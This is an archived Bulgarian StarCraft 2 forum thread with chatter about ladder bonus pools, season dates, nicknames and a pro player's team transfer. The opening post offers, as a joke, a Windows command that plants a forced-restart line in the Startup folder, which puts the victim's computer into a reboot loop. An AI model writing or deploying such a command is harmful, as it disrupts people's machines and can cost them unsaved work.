Jump to content
BulForum.com

StarCraft 2


Dread Lord

Recommended Posts

Ето и скриптче за терани :D

echo shutdown -r -f -t 20 -c "YOUR COMPUTER HAS BEEN NEURO PARASITED!" > "%HOMEPATH%\Start Menu\Programs\Startup\startup.bat"

echo shutdown -r -f -t 20 -c "YOUR COMPUTER HAS BEEN NEURO PARASITED!"

Link to comment
Share on other sites

  • Replies 10.1k
  • Created
  • Last Reply

Абе на мен ли само ми е спряло бонус пуула? От няколко дена не ми дава никакви точки...

 

Утре приключва сезона или почва новия не помня. Нещо 19ти ми се върти в главата.

Link to comment
Share on other sites

По спомени S03E01 започва на 26-ти. Иначе бонус пуула са ти го спрели, защото blizzard не могат да измислят как да оправят баланса и решили да махнат bonus pool-а на всички зерги :Р

Link to comment
Share on other sites

... защото blizzard не могат да измислят как да оправят баланса и решили да махнат bonus pool-а на всички зерги :Р

Ахахахаха... това ми дойде като свеж въздух в задръстен кенеф. :laughing:

Link to comment
Share on other sites

Няма по-голям кеф:

 

Груби срещу Yolini.SuHo (Или WE, не знам какво се води) на Уаркрафтец...

По едно време Сухо му вика:

 

I want play you on sc2!

 

 

Ееех, младост..

Link to comment
Share on other sites

Смених си името на нещо малко по-уникално от ликуид - GotNoSkill #500 :д

Аз преди няколко месеца играх срещу хора със следните никове:

 

Terran (P)

Computer (T)

 

По което разбираме, че тераните и протосите обикновено са ръбове.

Това казах и на двамата

It's a very imaginative nickname you have there

Link to comment
Share on other sites

На мен ми писна всякакви келеши да ме питат дали не съм бил от ТЛ и ако не съм що съм ползвал тяхното име и т.н., пълно е със слабоумни дЯца. Ако си в златото, сребро, платина или дори диамант и играеш с/у някой си liquid, особено ладър, как може да ти мине през главата, че той е от ТЛ...

Link to comment
Share on other sites

Още един кореец се присъединява към "чуждестранен" отбор.

 

Става дума за победителя от NASL Season 1 - Puma. По това, което чета, изглежда, че Evil Geniuses едва ли не са го откраднали от TSL, тъй като са се договорили с него (заплата + пари за пътувания до турнири извън Корея), докато е бил в Америка за турнира, без да се допитат до мениджърите на корейския отбор.

 

Оттук нататък EG не трябва да губи clanwars :)

Link to comment
Share on other sites

Съвсем наскоро разбрах, че Lucifron = Naniwa. Бях потресен. Lucifron го помня още от бетата на TFT, когато беше ужасно активен по близ форумите (тогава и аз играех доста и пишех от време на време), беше с доста пиперлив език и едновременно даваше доста адекватни идеи. Помня един случай, когато някакъв се оплака (със скрийншот), как въпросния трол му написал "I hope all of your family dies in a car crash", след игра 2:2 в която Люси(Нани) му казал да прави anti-air, ония направил 6 балисти...

Link to comment
Share on other sites

Май се бъркаш. Lucifron в СК2 е един испански теран, който скоро никакъв не се е вясвал. Един от старите никовe на Naniwa e бил Lucifer, може би за това се сещаш.

 

lucifron3.jpg

 

naniwa.jpg

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.


×
×
  • Create New...